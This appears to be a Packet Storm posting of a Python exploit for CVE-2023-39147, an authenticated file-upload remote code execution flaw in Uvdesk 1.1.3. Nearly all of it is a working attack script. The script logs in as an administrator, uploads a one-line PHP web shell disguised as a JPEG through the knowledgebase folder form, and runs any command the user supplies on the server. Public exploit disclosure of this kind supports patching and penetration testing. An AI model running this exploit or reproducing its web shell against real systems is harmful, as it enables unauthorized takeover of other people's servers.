Uvdesk version 1.1.3 suffers from a remote shell upload vulnerability.
785a58fce3185616f8ebb56cc4c3498d9ba2782170d34b1c487a14564309a3e1# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6
import requests
import argparse
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
my_args = parser.parse_args()
return my_args
def main():
args = get_args()
base_url = args.url
command = args.command
uploaded_file = "shell.php"
url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command
# Edit your credentials here
login_data = {
"_username": "admin@adm.com",
"_password": "passwd",
"_remember_me": "off"
}
files = {
"name": (None, "pwn"),
"description": (None, "xxt"),
"visibility": (None, "public"),
"solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
}
s = requests.session()
# Login
s.post(base_url + "/en/member/login", data=login_data)
# Upload
upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
# Execute command
cmd = s.get(url_cmd)
print(cmd.text)
if __name__ == "__main__":
main()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed